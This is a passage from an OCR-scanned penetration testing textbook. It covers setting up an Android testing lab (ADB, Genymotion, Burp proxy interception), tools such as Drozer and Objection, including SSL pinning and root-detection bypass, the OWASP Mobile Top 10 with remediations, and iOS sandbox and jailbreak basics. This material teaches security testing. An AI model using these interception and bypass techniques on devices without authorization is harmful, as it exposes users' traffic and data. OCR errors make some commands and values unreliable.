2807>: Vold 2.1 <the revenge) firing up 
_ sapiens git 205): Using in-kernel low memory killer interface 
sf € 2@8>: Failed to connect to host (UnixStreanm>?tt? 
E/gralloc_vbox86¢ 288>: gralloc: Failed to get host connection 
E/SurfaceFPlinger¢ 268>: hwcomposer module not found 
E/SurfaceFlinger< 2@8>: ERROR: failed to open framebuffer (1/0 error), aborting 
beginning of crash 
288>: Fatal signal 6 (SIGABRT>, code -6 in tid 208 <surfacef linger) 
68): HEPEME FETED -FEEDE DEDEDE DEDEDE DEDEDE DEDEDE DEDEDE FEDERE DEDEDE DEERE DOREME DEDEDE stpERE 
: Build fingerprint: ’generic/vbox86p/vbox86p:5 .6@/LRX&21M/buildb 
: Revision: ’@’ 
: ABI: ’x86’ 
: pid: 208, tid: 208, name: surfaceflinger >>> /systen/bin/sur 
> signal 6 CSIGABRT>,. code -6 (SI_TKILL>. fault addr 
eax 66000800 ebx BOB00GdG ecx BHBBBEdG edx BHBBBOHSE 
esi b?7fdf@8 edi 88888882 
xcs 6800008073 xds @8080087b xes 88000007b xfs B8BBBB800 
eip b7768ab6 ebp 66080800 esp bffSce38 flags 868000282 


AARAARAAABRAABZA 


Figure 10.27: ADB logcat command 
All the logs begin with several message kinds, which can be summarized as follows: 
: Verbose 


: Debug 


: Information 


V 
D 
I 

e w: Warning 
E: Error 
F: Fatal 
s: Silent 


Sideloading apps 


Sideloading typically means installing an application package in APK format onto an Android 


device. Such packages are usually downloaded from websites other than the official app store 
Google Play. Installing a custom ROM on an Android smartphone is possible, and ADB allows 
you to sideload the software. Running ADB sideload package.zip, which is equivalent to ADB 
push and insta11, will accomplish this. 


Monkeyrunner 


Monkeyrunner is an Android SDK utility that allows developers to create or use pre-existing 
apps to control a connected device emulator. 


If you run ADB shell monkey 2, for example, it will inject the event ID 2 and launch the 
application without a user interface. Refer to Figure 10.28: 


c:\ \sdk\platform-tools>adb shell monkey 2 
Events injected: 2## Network stats: elapsed time=1185ms (Oms mobile, Oms 


wifi, 1185ms not connected) 


Figure 10.28: ADB shell monkey command 


Genymotion 


Genymotion is a replacement for the Android Virtual Device (AVD) manager included with the 
Android SDK. This will be used throughout the Android assessment section of this book. 
Genymotion is only available for download after you create an account in their cloud and follow 
the steps at https://www.genymotion.com/#!/download. There are two different kinds of 
licenses: 


1. Personal use: The possibilities for running an emulation in this version of Genymotion 
are restricted. 

2. Commercial use: This version of Genymotion gives developers added features, including 
network debugging, design simulation, and automation. 


Genymotion is preferred by testers and developers as an emulator due to its superior performance 
when compared to the Android SDK’s emulators (even with Intel Hardware Accelerated 
Execution Manager enabled). This is not, however, a replacement for the Android SDK’s AVD. 


Step-by-step instructions for installing Genymotion are provided as follows: 


1. Double-click the program when it has been downloaded, and a window wizard will 
appear, as seen in Figure 10.29: 


j5) Setup - Genymotion |-o-| © 


Welcome to the Genymotion 
Setup Wizard 


This will install Genymotion version 2.5.4 0n your computer. 


It is recommended that you close all other applications before 
continuing. 


Click Next to continue, or Cancel to exit Setup. 


Figure 10.29: Genymotion installation_1 


2. By selecting Next, we will be sent to the next Figure 10.30, where we will be able to 
choose the folder in which we want to install this application. All the apps will be 
installed in the c:/ drive in our scenario. Refer to Figure 10.30: 


| ey Setup - Genymotion 


Where should Genymotion be installed? 
h Setup will install Genymotion into the following folder. 


To continue, dick Next. If you would like to select a different folder, dick Browse. 


C: | \Genymotion Browse... 


Atleast 197.6 MB of free disk space is required. 


Figure 10.30: Genymotion installation_2 
3. The installation begins after confirmation, as demonstrated in Figure 10.31: 
fey Setup - Genymotion 
Installing 


Please wait while Setup installs Genymotion on your computer. 


Extracting files... 
C:1 \Genymotion \tools \adb.exe 


Figure 10.31: Genymotion installation_3 


4. Genymotion uses Oracle VirtualBox to execute the emulator, so the system image stays in 
the virtual box even if the frontend software, that is, Genymotion, is uninstalled. If you 
did not download Genymotion with VirtualBox, Figure 10.32 will not work for you: 


ey Setup - Genymotion 


Installing 
Please wait while Setup installs Genymotion on your computer. 


Installing Oracle VirtualBox 5.0.4... 


Figure 10.32: Genymotion installation_4 


5. As shown in Figure 10.33, our downloaded Genymotion file includes the package of a 
pre-compiled version of Oracle Virtual Box: 


Welcome to the Oracle VM 
VirtualBox 5.0.4 Setup Wizard 


The Setup Wizard will install Oracle VM VirtualBox 5.0.4 on 
your computer. Click Next to continue or Cancel to exit the 
Setup Wizard. 


Figure 10.33: Oracle virtual box installation 


6. Clicking Next will force you to install VirtualBox, which will take up some space. 


7. Once Oracle VirtualBox is installed, Genymotion is installed as well, and we are ready to 
construct our first Android virtual image. Refer to Figure 10.34: 


j5 Setup - Genymotion ece||=)~|| £3 


Completing the Genymotion Setup 


&. Wizard 


Setup has finished installing Genymotion on your computer. 
The application may be launched by selecting the installed 
icons. 


Click Finish to exit Setup. 


7) Launch Genymotion 


Figure 10.34: Genymotion installation_5 


Creating an Android virtual emulator 


Now that we have got Genymotion and Oracle VirtualBox set up, we will go ahead and make a 
new Android Virtual Emulator, which we will use to run a variety of tests. The steps to set up an 
emulator in Genymotion are as follows: 


1. When you first run Genymotion, you will see a popup for the usage notice, followed by an 
alert to build a virtual device, as shown in Figure 10.35: 


@© Add a first virtual device 
(?) You do not have any virtual device yet. 


Do you want to add a new one? 


Yes No 


Figure 10.35: Genymotion 


2. By selecting Yes, the next choice will direct us to our Genymotion Cloud account, as 
shown in Figure 10.36: 


D 
-_ 


iw Select a new virtual device 


Android version jan | Device model 


Available virtual devices 


Figure 10.36: Genymotion cloud account 


3. After logging in, we can examine all the available Android photos and then click Next. 


By selecting Following, we will proceed to the next step, where we will enter the name of 
the emulator we will create. We will call it Google Nexus—Penetration Testing Device in 
this case, as shown in Figure 10.37: 


& Create a new virtual device 


Virtual device name 


Google Nexus: Penetration Testing Device] 


Please check the virtual device properties before deployment 


Google Nexus 5X - 6.0.0 - API 23 - 1080x1920 
Description Google Nexus 5X (5.2", 1060x1920, 4200P 1) AOSP6.0.0 API 23 
System versson 

Name Genymotion Phone - 6.0.0- API23-260 
Description Gerymaotion Virtual Device for Phone 
Andro Version 600 

Release date Thu Jan 1401.04.49 2016 

Version number 260 

Screen size - Density 1060x1920 - 420 dpi 

Memory size 2048 MB 

Number of CPUs 4 

Data desk capacity 32768 MB 


Figure 10.37: Genymotion Google Nexus Device 


5. Because Genymotion uses hardware-based acceleration, we may need to configure several 
processors during the installation process. As demonstrated in the following Figure 10.38, 
we are using one processor for the basic setup: 


:@; Configuration 


— System 


Processor(s) 


Base Memory (MB) 


— Screen size - Density 


O Predefined 


@ Custom 


Caution: you may experience issues using custom values 


L] Run virtual device in full-screen mode 


— Android system options 


Show Android navigation bar 
[_] Use virtual keyboard for text input 


Figure 10.38: Genymotion device settings 


6. We are ready to use the device now that we have finished setting up the first Android 
virtual emulator by pressing Start. 


7. Finally, our virtual device should be visible, as shown in Figure 10.39: 


4Z ® 


Gallery Settings 


Figure 10.39: Genymotion device start 


An ADB devices command can be used to confirm this, as shown in Figure 10.40: 


C: EBB) \s dk\\platform-tools>adb devices 
List of devices attached 
192.168 .56.161:5555 device 


Figure 10.40: ADB devices command 


In some circumstances, as demonstrated in Figure 10.41, we may receive the trigger for an error 
message, which can be resolved by enabling Intel Virtualization Technology, or Intel VT-x, in 
the BIOS: 


®) Unable to start the virtual device 


VirtualBox cannot start the virtual device 


To find out the cause of the problem, start the virtual device from 
VirtualBox 


For more information, check the log files. Please refer to 
https-//www.genymotion.com/#'/su 


Figure 10.41: Virtualization technology message 


Installing an application to the Genymotion emulator 


Installing an application to the emulator can be done in one of two ways: either by downloading 
it or by using ADB to install one made by developers: ADB install appname.apk. 


You can also drag and drop an APK file directly into the emulator, as illustrated in Figure 10.42: 


Genymotion for personal use - Google Nexus - Penetratio...  « 


Android 


File transfer in progress 


Zz | 


Figure 10.42: Drag and drop APK file 


Installing the Genymotion plugin to Android Studio 


If the app developers are writing the code in Android Studio and are unable to immediately test 
their apps using the Android emulator, it is really challenging. Instead, users wind up installing 
the software after signing it in each time. 


The following actions must be taken to enable Genymotion VMs in Android Studio: 


1. Navigate to Android Studio. Go to Settings and select Plugins. 


2. In the screen capture as follows, find genymotion, right-click on it, and then choose 
Download and Install. Refer to Figure 10.43: 


Genymotion 


eeeet 


Thes plugin allows you to create anc start EMME virtual Gevices 
tom Andro Stuado 


Change Motes 


See me revease notes co RENMMMMR ne nsite 


Figure 10.43: Genymotion plugin 


3. Launch Android Studio again. Android Studio has the Genymotion device manager 
installed. To make starting an application easier, set the application path to Genymotion 
by going to File | Settings | Other Settings | Genymotion, as seen in Figure 10.44: 


Other Settings » Genymotion 
Select the path to the Genymotion folder 
CN \Genymeotion 


Figure 10.44: Genymotion plugin setting 


4. The Genymotion device manager has now been successfully installed. We are prepared to 
create and launch the app on the device. Refer to Figure 10.45: 


™® Genymotion Device Manager 


List of available Genymotion virtual devices 


Name AOSP Version Genymotion Vee _ IP Address Status 


Google Nexus... 6.0 2.6.0 192.168.56.101 Process 


Figure 10.45: Genymotion device manager 


ARM apps and play store in Genymotion 


Only ARM-based hardware can execute some applications. We can add a specific package to 
address this issue by obtaining ARM translation from https://docs.google.com/file/d/0B- 
p1ir5SNN4adcmhtaGdMVml0Qzg/edit in order to prevent app crashes, which notably make 
use of these ARMs. 


As you can see in Figure 10.46, simply drag and drop the ZIP file onto the emulator. 
Additionally, keep in mind that the bundles will vary depending on the Android platform. Refer 


to Figure 10.46: 


File installation warning 


File Genymotion-ARM-Translation_v1.1.zip seems to be a flashable archive. Do 


you want to flash it to the virtual device? 
Caution: this operation may corrupt the virtual device 


Figure 10.46: Drag and drop zip file 
For that, we must download’ the _ gapps-lp-20141109-signed.zip file from 
and then drag and drop it onto the 
virtual device to install Google Play Store. 


After both apps have been installed, restart the Seeti and you should see Play Store installed in 
our Genymotion emulator, as shown in 


Figure 10.47: Install Google Play Store 


We can browse all the compatible apps in the store thanks to Play Store being available on the 
emulator. This will be incredibly helpful if you are conducting a black box analysis. 


Configuring the emulator for HTTP proxy 


Here, we are assuming two test cases: first, an Android emulator from Genymotion with a Wi-Fi 
connection, and second, an internet-connected LTE/3G/2G device. Even in the actual device, this 
will be the same. 


Let us have a look at the various proxy tools that are available before we start configuring the 
emulator for proxies. These include, but are not limited to, the following: 


e Burp Suite: The majority of penetration testers choose this proxy, which can be 
downloaded from https://portswigger.net/burp/download.html. There are two editions: 
one is free, and another is intended for commercial usage. The commercial edition offers a 


variety of options, including scanners, among others. 


e Paros Proxy: This open-source Java-based proxy was created specifically to look for 


weaknesses in Web applications. From https://sourceforge.net/projects/paros/files/, you 
can download it. It was replaced by OWASP ZAP because it was not updated enough. 


You can still use this proxy as a backup, though. 
¢ OWASP ZAP: This is a vulnerability discovery tool that is open source and integrated. 
From https://github.com/zaproxy/zaproxy/wiki/Downloads, you can download it. 


There are several additional tools that can be investigated, such as Context Application Tool, 
ProxyFuzz, Odysseus proxy, Fiddler, and others. 


There are two ways to intercept the data flow between the device and the server: 
e Setting up the proxy in Wi-Fi settings. 
e Setting up the proxy in mobile carrier settings. 


Setting up the proxy in Wi-Fi settings 
Assume that the device can only connect to Wi-Fi and does not have the capacity to use a SIM 
card: 


1. Go to Settings | Wi-Fi and choose the currently connected Wi-Fi. After 30 seconds, hang 
in there to view the choices depicted in Figure 10.48: 


Qo ee ee eee 


WiredSSID 


Forget network 


Modify network 


Figure 10.48: WIFI setting 


2. Navigate to Modify Network | Advanced Option | Proxy | Manual. 


3. Enter the IP address of your proxy; in this instance, Burp Suite is running on port 8080 at 
192.168.2.1. Refer to Figure 10.49: 


Genymotion for personal use - Google Nexus - Penetratio..| <= | (=). futjal 


WiredSSID 


Advanced options 


Manua 


The HTTP proxy is used by the browser but 
may not be used by the other apps 


192.168.2.1 


Figure 10.49: Proxy IP address and proxy port setting 


4. The Wi-Fi has been set up effectively to intercept the proxy. We can see from the Burp 
Proxy Figure 10.50 that we can eavesdrop on HTTP Web traffic: 


Figure 10.50: Burp suite 


If you want the device to be accessible over the network, you can change the settings to Bridge 
Mode by opening the Oracle Virtual Box and selecting Name of the VM | Settings | Network | 
Adapter 2 | Change the NAT to Bridged. By default, Genymotion configures the Network 


Adapter settings in the Oracle Virtual Box to NAT. 


Setting up the proxy on mobile carrier settings 


Let us assume that the Android device can connect to Wi-Fi and a SIM card: 


1. Click Settings | More | Cellular networks | APN | As seen in Figure 10.51, choose the 
APN you want to edit: 


___Genymotion for personal use - Google Nens - Penetratio.. |) fees) 


Proxy 


192.168.2.1 


Figure 10.51: APN setting 
2. Set the IP address of your proxy and the port number. 
3. You have configured the device to connect to your proxy. 


Many features, including screen capture, phone options, the virtual device version, and others, 
are not available in Genymotion’s free edition for personal use. 


Android penetration testing tools 


There are many tools available for Android penetration testing, but let us look at the top six that 
are frequently used: 


1. Android Debug Bridge (ADB): A command-line tool called Android Debug Bridge 
(ADB) is used to interact with devices. The application can be installed, debugged, backed 
up, and data can be pushed to or pulled from the device, among other device functions. 
Refer to Figure 10.52: 


:~$ adb version 
Android Debug Bridge version 1.0.39 
Version 1:8.1.0+rf23-5~18.04 
Installed as /usr/lib/android-sdk/platform-tools/adb 
:~$ adb devices 


List of devices attached 
ZF6222C9XZ device 


:~$ 


Figure 10.52: ADB tool 


2. MobSF: Mobile Security Framework (MobSF) is an automated, all-in-one mobile 
application Pentesting framework that can do static, dynamic, and malware analysis on 
mobile applications running on Android, iOS, and Windows. It supports binaries (APK, 
IPA, and APPX) as well as zipped source code and can be used for efficient and quick 
security analysis of Android, iOS, and Windows mobile applications. Additionally, 
MobSF has the ability to test an application dynamically, as shown in Figure 10.53. 
MobSF can be downloaded from _https://github.com/MobSF/Mobile-Security- 
Framework-MobSF: 


| ¢€ c 


& Upload & Analyze 


Figure 10.53: MobSF tool 


3. Drozer: MWR Labs created Drozer, a thorough security and attack framework for 
Android. You can communicate with the underlying OS, the Dalvik VM, and other 
programmers’ IPC endpoints, as shown in Figure 10.54. Drozer can be downloaded from 


https://github.com/FSecureLABS/drozer: 


# drozer console connect 
Selecting fic715@be9f@bé60c ( 


ro .idsnemesisand. -pr 
-otectorandroidsneme. 
., Sisandprotectorandroids+. 
. snemesisandprotectorandroidsn:. 
-emesisandprotectorandroidsnemes.. 
-isandp,..,rotectorandro,..,idsnem. 
-isisandp..rotectorandroid..snemisis. 
, andprotectorandroidsnemisisandprotec. 
. torandroidsnemesisandprotectorandroid. 
- snemisisandprotectorandroidsnemesisan: 
.dprotectorandroidsnemesisandprotector. 


drozer Console (v2.4.4) 
dz> help 


drozer: Android Security Assessment Framework 


Type “help COMMAND’ for more information on a particular command, or ‘help 
MODULE’ for a particular module. 


Commands: 


cd contributors env help load permissions set unset 
clean echo exit list module run shell 


Miscellaneous help topics: 


intents 


dz> 
Figure 10.54: Drozer tool 


4. d2j-dex2jar: It is a tool for working with .dex and . jar files for Android. This facilitates 
.dex file to .class file conversion (zipped jar files), as shown in . D2J- 
Dex2jar can be downloaded from : 


MI we . kL 


> d2j-dex2jar.sh classes.dex 
dex2jar classes.dex -> ./classes-dex2jar.jar 
> 


Figure 10.55: d2j-dex2jar tool 


5. JD-GUI: JD-GUI is a stand- alone graphical tool that shows the class files’ Java source 
code, as shown in . JD-GUI can be _ downloaded from 


eee EEE eee 
Figure 10.56: JD-GUI tool 
6. Objection: Frida-powered Objection is a runtime mobile exploration toolkit, as shown in 
Figure 10.57. Without requiring a jailbroken or rooted mobile device, it was designed to 
assist in evaluating mobile applications and their security posture. This tool’s features 
include the following: 
e Bypassing SSL pinning and Root detection 
e Remove Android Heap and Keystore 


Tracks the copy/paste buffer cache on Android 
e Hook one or more runtime methods of a class 
e Run unique Frida scripts 


e Use Android intents where necessary 


You can get it from https://github.com/sensepost/objection: 


Using USB device “Motorola moto g(6) 


= 
et tl 
) 


(object)i (ton) vi.7.5 


Runtime Mobile Exploration 
by: @leonjza from @sensepost 


Figure 10.57: Objection tool 


Secure android applications 


For app developers that want to construct safe apps, the OWASP mobile top 10 list is an 
excellent reference. This is due to the fact that many mobile apps are naturally open to security 
vulnerabilities. Let us consider a handful of assaults against mobile apps that have happened in 
recent years. There was Pegasus spyware for WhatsApp, which gave attackers access to users’ 
smartphones. Another was the assault on the Pokémon Go app, which was vulnerable to reverse 
engineering by users who wanted to catch more Pokémon. 


Numerous additional applications and businesses, such as Tinder and MediaTek, have 
experienced mobile security assaults. But why are they so defenseless? As mobile apps can be 
downloaded from public shops and the code can be examined, they have a larger attack surface 
than Web apps. Together with the volume of user data they can gather, this makes us highly 
alluring targets for hackers. 


The most prevalent security weaknesses discovered on mobile devices are listed in the OWASP 
mobile top 10 vulnerabilities. But what vulnerabilities are listed on the OWASP mobile security 
list? 


OWASP mobile top 10 vulnerabilities 


The open Web application Security Project foundation presented the OWASP mobile security 
risks for the first time in 2011 based on comments and survey data gathered from the global 
community. Following that, additional lists were published in 2014 and 2016; the latter is the 
most recent and up-to-date OWASP mobile top 10 list. 


While there is one precise carryover from the top 10 mobile dangers list from 2014, the 
categories for the 2016 list are primarily different. For instance, two new dangers were added to 
the 2016 list while removing one item from the 2014 list. Additionally, they divided several 
categories into two to be addressed separately. Refer to Figure 10.58: 


OWASP Mobile Top 10 — 2014 to 2016 List Changes 


OWASP Mobile Top 10 2014 OWASP Mobile Top 10 2016 


Figure 10.58: A side-by-side comparison of OWASP 2014 and 2016 mobile risks 


In light of this, let us examine the 10 mobile dangers that were ultimately selected in 2016 and 
consider how you might address these risks. 


Improper platform usage 


Improper platform usage is ranked as the top mobile security vulnerability in the most recent 
OWASP mobile top 10 ranking. Whether you use Android or iOS, each of these platforms is 
expected to follow specific development standards for security reasons. Apps may, however, 
unintentionally transgress these best practices and established recommendations or make 
mistakes during their implementation. This initial mobile security risk focuses on that. 


The exploitation of any platform functionality of the Android or iOS operating system or the 
disregard for platform security rules are considered threats. This includes concerns with the 
erroneous usage of platform elements and security controls that are a part of the mobile operating 
system, such as: 


e Unauthorized access to the device may come through misuse of the iOS Touch ID 
function. 


e Using the iOS Keychain incorrectly, such as by keeping session keys in the app’s local 
storage. 


e Requesting too many or the incorrect platform permissions. 


e Android intents that are marked public may leak sensitive information or allow 
unauthorized execution (used to request an action from another app component). 


Remediation measures for this vulnerability: 


You need to take care of this OWASP mobile security issue on the server end of things. Using 
secure coding techniques and implementing the proper configuration settings on the server side, 
in addition to adhering to platform development rules, reduces risks. The following are some 
additional mitigation measures to stop platforms from being misused: 


e Restricting access, implementing restrictive file permissions, preventing apps from 
interacting with one another, and so on. 


e Applying the most stringent protection class for iOS keychains and following 
recommended practices to prevent shoddy control implementation 


Insecure data storage 


Insecure data storage comes in second on the OWASP mobile top 10 lists. It is possible for your 
mobile device to disappear or be stolen and end up in the hands of an enemy. Or the attacker 
might use malware that runs on the device and acts on their behalf to exploit flaws that let 
personal information leak and give them access to sensitive data. 


Although it is not always possible to create apps that do not save data, it is essential to do it 
safely and, in a location, where neither another app nor a person would be able to access it. Dev 
teams must never assume that attackers will not have access to filesystems if they are readily 
available. Jailbreaking or rooting a mobile device is sufficient to get around encryption security. 


Remediation measures for this vulnerability: 
To comprehend what information assets are processed by the application and how the APIs 
handle the data, the threat model the app. By doing this, you can: 
e Analyze the effectiveness of the encryption process and the security of the encryption 
keys. 


e Implement technologies, such as buffer overflow protection and obfuscation, to harden the 
code against tampering. 


e Wherever possible, avoid caching or storing data. 


e Implement reliable authorization and authentication checks. 


Insecure communication 


In the OWASP mobile top 10 list for 2016, insecure communication comes in third. Anyone 
keeping an eye on the network can intercept and read all the information being transferred over 
the wire if the data is sent in cleartext and unencrypted. 


Client-server data interchange is ubiquitous in mobile apps, and this data must be securely 
delivered through the device’s carrier network and the internet. Cell towers, proxies, spyware 
installed on your device, or an enemy compromising your Wi-Fi can all intercept the traffic. 
What can you do, then, to lessen the risks involved in this kind of data exchange? 


Remediation measures for this vulnerability: 
e Use industry-standard encryption techniques and other general best practices to prevent 
data theft as it moves across the network. 


e To secure all communication channels, use SSL/TLS certificates issued by reputable 
certificate authorities (CA). 


e If an incorrect SSL/TLS certificate is found or if the certificate chain verification process 
is unsuccessful, notify users. 


Insecure authentication 


The next vulnerability on the OWASP list for mobile security is insecure authentication. Mobile 
apps must confirm the user’s identity prior to allowing access. A common method of executing 
an authentication bypass is to take advantage of known flaws, such as faulty service request 
validation carried out by the backend server of the mobile app. Particularly when transmitting 
sensitive data, such as banking information, mobile apps need to confirm, and maintain user 
identity. 

Remediation measures for this vulnerability: 


An attacker may take advantage of holes in the mobile app authentication system. By taking 
advantage of those flaws, they can get around password restrictions or obtain more permissions, 
which can result in data theft and other harm. 


So, what can you do to stop it? 


e Do not use local authentication techniques. Place this responsibility on the server side 


instead and only download application data upon successful authentication. 


e Avoid using weak authentication techniques (such as device identity), avoid storing 
passwords locally, use multi-factor authentication (MFA), forbid using the entire four- 
digit PIN as a password, and so on. 


Insufficient cryptography 
A system’s cryptography may be broken in one of two circumstances, exposing sensitive 
information: 

e It is possible that the fundamental encryption and decryption algorithm is insecure, or 

e There are implementation problems with the cryptography process itself. 
Mobile apps with broken cryptography may be the consequence of a number of different things. 
The following are some of these possible causes: 

e bypassing the encryption techniques incorporated within the code, 

e managing your digital keys improperly, and 


e using non-standard or outdated encryption techniques. 


Remediation measures for this vulnerability: 


Inadequate cryptographic safeguards may enable unauthorized access to sensitive data (such as 
the user’s personal information) stored on the device. 


e Use the National Institute of Standards and Technology’s (NIST) recommended strong 
cryptographic standards. 


e When possible, avoid storing any sensitive information on the device. 


Insecure authorization 


Users are not all created equally! Although some users only need the basic permissions and 
capabilities, others, like admin users, may need more. Poor authorization protocols do not check 
the user’s identity or authority to access the requested resources. Hackers are able to log in as 
authorized users and conduct privilege escalation attacks because identification policies and the 
rights granted to users are not effectively enforced. 


Remediation measures for this vulnerability: 


Similar to insecure authentication, unsecured authorization has negative effects. Both of them 
carry the risk of data loss, harm to one’s reputation, and potential noncompliance fines and 
penalties. 


e Make sure that the backend processes for each request check to see if the incoming 
identifiers linked to an identity match and genuinely belong to the identity. 


e Use data from backend systems to validate a user’s roles and permissions rather than 
relying just on data from the user’s mobile device. 


Client code quality 


This section of the OWASP mobile security threats list is sort of a catch-all for problems with 
mobile clients caused by bad code implementations. 


An attacker may send specially created inputs to function calls made within an app in an effort to 
run them or track the activity of the program. It might result in decreased speed, more memory 
consumption, and so on. Because they occur on the mobile client and are distinct from coding 
errors that occur on the server, the coding errors must be corrected locally. Mobile apps may 
contain errors at the code level that might result in problems like: 

e Format-string vulnerabilities. 

e Buffer overflows. 

e Integration with insecure third-party libraries. 

e Remote code execution. 
Many apps rely on third-party libraries, which frequently have problems and are not thoroughly 
tested, to create their applications. Since they do not own the code, these problems are beyond 


the developer’s control. Rewriting portions of the code now being executed on the device is the 
most common solution for code-level issues. What else can you do, though? 


Remediation measures for this vulnerability: 


Remote code execution and other vulnerabilities and problems that we have already highlighted 
can result from poor code quality issues. Fortunately, there are a few things you may do to lessen 
these problems: 


e Use automated tools to check for memory leaks, buffer overflows, and other issues. Rely 
on source code reviews. Write clear, well-documented code. 


e Use consistent coding patterns across the organization. 


Code tampering 


Modified versions of mobile apps can occasionally be found in app stores. A modified program 
is one where a hacker changes the binary to add harmful code, set up a backdoor, and so on. 
Attackers have the ability to re-sign these fake apps and upload the updated version to other app 
stores. In order to mislead a victim into downloading the software, they can also deliver to them 
directly via a phishing attack. 


Remediation measures for this vulnerability: 
Modifying the code can result in financial losses, identity theft, reputational harm, and other 
problems. 


e If more code has been added or modified, the app must be able to recognize any code 
integrity violations and respond appropriately to them when they occur. Users may be 
informed about code changes by using a tool like a code signing certificate. 


e Utilize anti-tamper techniques to disable the execution of unauthorized apps by using 
checksums, digital signatures, code hardening, and other validation approaches. 


Reverse engineering 


Attackers might decompile and reverse engineer the app to analyze its source code. This is 
especially risky as the attacker may comprehend, examine, and edit the code to introduce 
destructive functionality or transmit unwanted adverts. They can edit the software using tools 
like IDA Pro, Hopper, and other binary inspection tools once they have a basic understanding of 
how it functions. They can recompile and launch the software once they have got it to behave as 
they want. 


Remediation measures for this vulnerability: 


The attacker must be unable to de-obfuscate the code using tools like IDA Pro and Hopper in 
order to prevent reverse engineering. 


Extraneous functionality 


Mobile app developers occasionally mistakenly include features or backdoors that are hidden 
from consumers via the user interface. These items might be put into use in a production setting 
with a feature that was not meant to be there, posing a security risk. 


Hackers can often take advantage of these flaws in their systems without the assistance of regular 
users. They may look through configuration files, analyze the binaries, and other things to find 
features of the backend system that hackers can use to launch an attack. 


Remediation measures for this vulnerability: 
Manual secure code review is one of the best approaches to stop these kinds of mobile app 
vulnerabilities. This makes it possible for you to: 

e Check the configuration settings of the mobile app to look for any concealed switches. 


e Make sure the logs do not contain assertions about the backend systems that are overly 
informative. 


Conclusion 


After reading this chapter, the reader will understand Android Architecture, and will learn how to 
set up Android Penetration Testing Environment and know the popular Android Penetration 
Testing Tools. Finally, the reader can learn how to protect their Android Applications, based on 
OWASP TOP 10. In the upcoming chapter, we will learn about iOS penetration testing as 
another popular mobile operating system. 


uestions 


1. Mention four native libraries that are found in Android architecture. 

2. Mention two native applications that are found in Android architecture. 
3. Mention three popular Android penetration testing tools. 

4. Mention four of OWASP’s Top 10 vulnerabilities for Android. 


CHAPTER 11 
iOS Penetration Testing 


Introduction 


The mobile application’s penetration testing involves Android and iOS, two key market players. 
Both operating systems are widely used and come with unique features. 


In this chapter, we will examine the iOS platform and how to begin penetration testing on an iOS 
application. We will begin by going over the fundamentals of the iOS application and some key 
information, then go on to the necessary tools, lab setup, and some simple attacks. 


While evaluating the API requests coming from an iOS application is like standard API 
penetration testing procedures. The primary distinctions are between static and dynamic 
functional analysis, circumventing established limitations, manipulating functions, and other 
amazingly intriguing things. 


Structure 


The following topics will be covered in this chapter: 


e Basics of iOS application 

e iOS application Sandbox structure 
e Vulnerable application 

e Testing methodology 

¢ OWASP mobile top 10 


Objectives 


In this chapter, you will be able to understand the basics of iOS applications, then learn iOS 
application sandboxing structure and know the popular iOS penetration testing tools. Finally, you 
will learn the testing methodology of the iOS application. 


Basics of iOS application 


Understanding the iOS platform, its built-in security features, and other key terms is crucial 
before starting with iOS application penetration testing. Now, we will go over some key phrases 
in the simplest, quickest way we can, then suggest additional reading to fully examine them. 


Architecture of iOS 


The iOS system’s basic architecture is shown in Figure 11.1, where multiple layers are used to 


create communication and carry out various functions between the application and hardware 
levels: 


Cocoa Touch (Application) 
AppKit ‘ 


_ AV Foundation Core Animation — | Core Audio _ Core Image 


{ Core Text | [ OpenAL | { OpenGL } [ Quartz | 


Address Book Core Foundation 


Quick Look || Scat || Securty || WebKr. 


Core OS 


Accelerate Directory Services _ Disk Arbitration 


OpenCL System Configuration 


Figure 11.1: iOS architecture 


Let us briefly go through a few of these layers: 


¢ Core OS: Numerous low-level functionalities are provided by the Core OS layer, upon 
which various services are constructed. These include Accelerate Framework, Directory 
Services, System Configuration, OpenCL, and so on. 


e Core services: Over the services offered in the Core OS layer, the core services layer 
offers an abstraction. These services generally include Address Book, Social, Security, 
Webkit, and so on. 


e Media: The device can use a variety of media services provided by the media layer, which 
essentially makes all audio-visual technologies possible. It provides various functions 
such as Core Image, Core Audio, Core Text, and so on. 


e Cocoa touch (application): The application layer is another name for the cocoa touch 
layer. It is the top layer in the architecture and exposes several APIs for creating iPhone- 
compatible software. 


The file extension for iOS applications is . IPA. 


File structure of an IPA 


To begin, we must rename the IPA file to have the .zip extension so that we may unzip it and 
analyze its structure. The contents are as follows when we unzip it: 


App binary: The executable file containing the compiled (unreadable) application source 
code. 


Info.plist: The info.plist file uses a list of different characteristics to describe the 
application to the operating system. When conducting security assessments, we frequently 
scan this file because it might provide valuable information or point out some 
configuration errors. 

Frameworks: List of dynamic libraries. 

Embedded .mobileprovsion: These are certificates. 

Keychain: An application can keep sensitive information in a keychain that is encrypted 
and can only be accessed by other applications with permission. View More: 
https://developer.apple.com/documentation/security/keychainservices. 


Refer to Figure 11.2: 


Figure 11.2: IPA file structure 


iOS application Sandbox structure 


So, how do applications work once they are installed on iOS? Because of Apple’s sandboxing, 
applications can create local databases on the aforementioned device. They are kept apart from 
other apps because of this. Because there will be a lot of programs storing data on the device’s 
hard drive, iOS gives each app its own sandbox to avoid conflicts. Refer to Figure 11.3: 
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Figure 11.3: Sandboxing in iOS 


The iOS device has three different types of sandboxes as follows: 


e Pre-installed App directory — /var/Application 


The app files for the applications that are pre-installed by default on the iOS device are 
kept in this directory. Refer to Figure 11.4: 


Figure 11.4: Pre-installed applications 


e Bundle directory — /var/containers/Bundle/Application 
The Bundle directory houses all of the files that are downloaded with apps from the Apple 


App Store often referred to as the IPA Container. Additionally downloaded from other 
places. This directory’s contents will not change as an application version changes. Refer 


to Figure 11.5: 


Figure 11.5: Bundle directory applications 


e Data directory - /var/mobile/Containers/data/Application 


The developer stores files they want to maintain in the Data directory also called the 
Local Data Storage Container. When the application is installed on the device, these 
are things that are related to it. Files that could be used as a cache for information to be 
accessed quickly or as a backup for offline data to be used when the application is 
reopened. Refer to Figure 11.6: 


Figure 11.6: Data directory applications 


Jailbreak 


The process of removing the company-imposed user limitations on your device is known as 
“jailbreaking.” It is crucial to be aware that Jailbreak violates your device’s warranty. Different 
jailbreaking techniques exist for iOS, depending on the version. A useful website for suggesting 
jailbreak tools depending on the iOS application is https://canijailbreak.com. It is important to 
note that jailbreaking can be carried out on Windows, Mac, or Linux systems. Additionally, there 
are other categories of jailbreaking, which are described as follows: 


e Untethered Jailbreak: Permanent Jailbreak, the device will be jailbroken even after a 
reboot 


e Tethered Jailbreak: Temporary Jailbreak, after a reboot device, will be back to its 
normal state. 


e Semi-tethered Jailbreak: The device can boot up independently after a semi-tethered 
jailbreak, but it will no longer have a patched kermel and will not be able to execute 
